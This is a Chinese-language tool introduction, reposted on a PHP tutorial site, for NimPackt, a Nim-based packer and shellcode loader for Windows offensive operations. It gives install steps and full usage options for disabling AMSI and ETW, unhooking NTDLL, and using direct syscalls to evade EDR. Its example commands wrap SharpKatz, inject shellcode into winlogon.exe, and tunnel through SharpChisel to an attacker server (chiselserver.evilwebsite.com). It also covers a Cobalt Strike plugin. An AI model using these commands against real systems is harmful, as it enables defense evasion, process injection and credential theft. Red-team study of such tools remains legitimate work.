NimPackt:基于Nim的汇编程序封装器和Shellcode加载器

雪夜
发布: 2025-09-03 08:11:17
原创
918人浏览过

关于NimPackt

nimpackt是一款基于nim命令式编程语言开发的强大工具,该工具同时具备汇编程序封装功能以及shellcode加载功能。

NimPackt是针对.NET(C#)可执行程序的封装工具,而且还可以实现在Windows系统上执行Shellcode。该工具能够以自动化的形式在Nim源码文件中封装Payload,而这些Payload可以是原生C代码,这样可以增加检测和逆向分析的难度。

该工具主要使用了下列两种技术:

功能介绍 工具安装

广大研究人员可以使用下列命令将该项目源码克隆至本地:

代码语言:javascript代码运行次数:0运行复制
<pre class="brush:php;toolbar:false;">git clone https://github.com/chvancooten/NimPackt-v1.git
登录后复制

注意:如果在使用Syscalls编译代码时遇到问题,请将你的GCC降级为v8.1.0。

Linux

在Linux操作系统上,直接安装该工具所需的依赖包,然后使用Nimble包安装工具来安装依赖组件和Python库:

代码语言:javascript代码运行次数:0运行复制
<pre class="brush:php;toolbar:false;">sudo apt install -y python3 mingw-w64 nimpip3 install pycryptodome argparsenimble install winim nimcrypto
登录后复制
Windows

下载Nim安装工具,确保安装好了mingw,并使用提供的finish.exe设置好正确的路径值。如果你没有安装Python 3的话,请配置好Python 3环境之后,使用下列命令安装好该工具所需的依赖组件:

代码语言:javascript代码运行次数:0运行复制
<pre class="brush:php;toolbar:false;">nimble install winim nimcryptopip3 install pycryptodome argparse
登录后复制
Docker安装

首先,我们需要在本地设备上安装并配置好Docker环境,然后确保在当前目录下输入Shellcode。接下来,按照下列方式在容器中开始代码编译:

代码语言:javascript代码运行次数:0运行复制
<pre class="brush:php;toolbar:false;">docker run --rm -v `pwd`:/usr/src/np -w /usr/src/np chvancooten/nimbuild python3 NimPackt.py -e shinject -i sc.bin
登录后复制
CobaltStrike插件

如需安装CobaltStrike插件,请选择菜单栏中的“Cobalt Strike -> Script Manager”,然后点击“Load”。确保从原始路径加载“.cna”文件:

NimPackt:基于Nim的汇编程序封装器和Shellcode加载器
工具使用 代码语言:javascript代码运行次数:0运行复制
<pre class="brush:php;toolbar:false;">usage: NimPackt.py [-h] -e EXECUTIONMODE -i INPUTFILE [-a ARGUMENTS] [-na] [-ne] [-r]                   [-t INJECTTARGET] [-E] [-o OUTPUTFILE] [-nu] [-ns] [-f FILETYPE] [-s] [-32] [-S]                   [-d] [-v] [-V]required arguments:  -e EXECUTIONMODE, --executionmode EXECUTIONMODE                        Execution mode of the packer. Supports "execute-assembly" or "shinject"  -i INPUTFILE, --inputfile INPUTFILE                        C# .NET binary executable (.exe) or shellcode (.bin) to wrapexecute-assembly arguments:  -a ARGUMENTS, --arguments ARGUMENTS                        Arguments to "bake into" the wrapped binary, or "PASSTHRU" to accept run-                        time arguments (default)  -na, --nopatchamsi    Do NOT patch (disable) the Anti-Malware Scan Interface (AMSI)  -ne, --nodisableetw   Do NOT disable Event Tracing for Windows (ETW)shinject arguments:  -r, --remote          Inject shellcode into remote process (default false)  -t INJECTTARGET, --target INJECTTARGET                        Remote thread targeted for remote process injection  -E, --existing        Remote inject into existing process rather than a newly spawned one (default                        false, implies -r) (WARNING: VOLATILE)other arguments:  -o OUTPUTFILE, --outfile OUTPUTFILE                        Filename of the output file (e.g. "LegitBinary"). Specify WITHOUT extension                        or path. This property will be stored in the output binary as the original                        filename  -nu, --nounhook       Do NOT unhook user-mode API hooks in the target process by loading a fresh                        NTDLL.dll  -ns, --nosyscalls     Do NOT use direct syscalls (Windows generation 7-10) instead of high-level                        APIs to evade EDR  -f FILETYPE, --filetype FILETYPE                        Filetype to compile ("exe" or "dll", default: "exe")  -s, --sleep           Sleep for approx. 30 seconds by calculating primes  -32, --32bit          Compile in 32-bit mode (untested)  -S, --showConsole     Show a console window with the app's output when running  -d, --debug           Enable debug mode (retains .nim source file in output folder)  -v, --verbose         Print debug messages of the wrapped binary at runtime  -V, --version         show program's version number and exit
登录后复制
工具使用样例

# 封装SharpKatz 在运行时接收参数,绕过NTDLL钩子、AMSI和ETW,在运行时将Verbose消息打印至控制台:

代码语言:javascript代码运行次数:0运行复制
<pre class="brush:php;toolbar:false;">python3 ./NimPackt.py -e execute-assembly -i bins/SharpKatz-x64.exe -S -v
登录后复制

# 将Seatbelt使用定制参数封装为DLL文件:

代码语言:javascript代码运行次数:0运行复制
<pre class="brush:php;toolbar:false;">python3 ./NimPackt.py -f dll -e execute-assembly -i Seatbelt.exe -a "-group=all -outputfile=c:\users\public\downloads\sb.txt"
登录后复制

# 使用内置ChiselChief 连接字符串封装SharpChisel,在运行时隐藏应用程序窗口:

AI封面生成器
AI封面生成器

专业的AI封面生成工具,支持小红书、公众号、小说、红包、视频封面等多种类型,一键生成高质量封面图片。

AI封面生成器 108
查看详情 AI封面生成器
代码语言:javascript代码运行次数:0运行复制
<pre class="brush:php;toolbar:false;">python3 NimPackt.py -nu -na -ne -e execute-assembly -i bins/SharpChisel.exe -a 'client --keepalive 25s --max-retry-interval 25s https://chiselserver.evilwebsite.com R:10073:socks'
登录后复制

# 将原始Shellcode封装为DLL文件,并通过直接系统调用在本地线程中执行‘

# 使用“msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o /tmp/calc.bin”命令生成Shellcode:

代码语言:javascript代码运行次数:0运行复制
<pre class="brush:php;toolbar:false;">python3 NimPackt.py -i calc.bin -e shinject -f dll
登录后复制

# 将Shellcode封装到新生成的计算器线程中:

代码语言:javascript代码运行次数:0运行复制
<pre class="brush:php;toolbar:false;">python3 NimPackt.py -i calc.bin -e shinject -t "calc.exe"
登录后复制

# 将Shellcode封装到现有Winlogon进程中,不实用直接系统调用或NTDLL钩子解除:

代码语言:javascript代码运行次数:0运行复制
<pre class="brush:php;toolbar:false;">python3 NimPackt.py -i calc.bin -e shinject -r -E -t "winlogon.exe" -nu -ns
登录后复制

工具测试结果

NimPackt:基于Nim的汇编程序封装器和Shellcode加载器
许可证协议

本项目的开发与发布遵循MIT开源许可证协议。

项目地址

https://github.com/chvancooten/NimPackt-v1

参考资料

https://github.com/slaeryan/AQUARMOURY/tree/master/Shellycoat

https://github.com/Flangvik/SharpCollection

https://nim-lang.org/install_windows.html

https://hub.docker.com/r/chvancooten/nimbuild

以上就是NimPackt:基于Nim的汇编程序封装器和Shellcode加载器的详细内容,更多请关注php中文网其它相关文章!

编程速学教程(入门课程)
编程速学教程(入门课程)

编程怎么学习?编程怎么入门?编程在哪学?编程怎么学才快?不用担心,这里为大家提供了编程速学教程(入门课程),有需要的小伙伴保存下载就能学习啦!

下载
来源:php中文网
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
开源免费商场系统广告
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号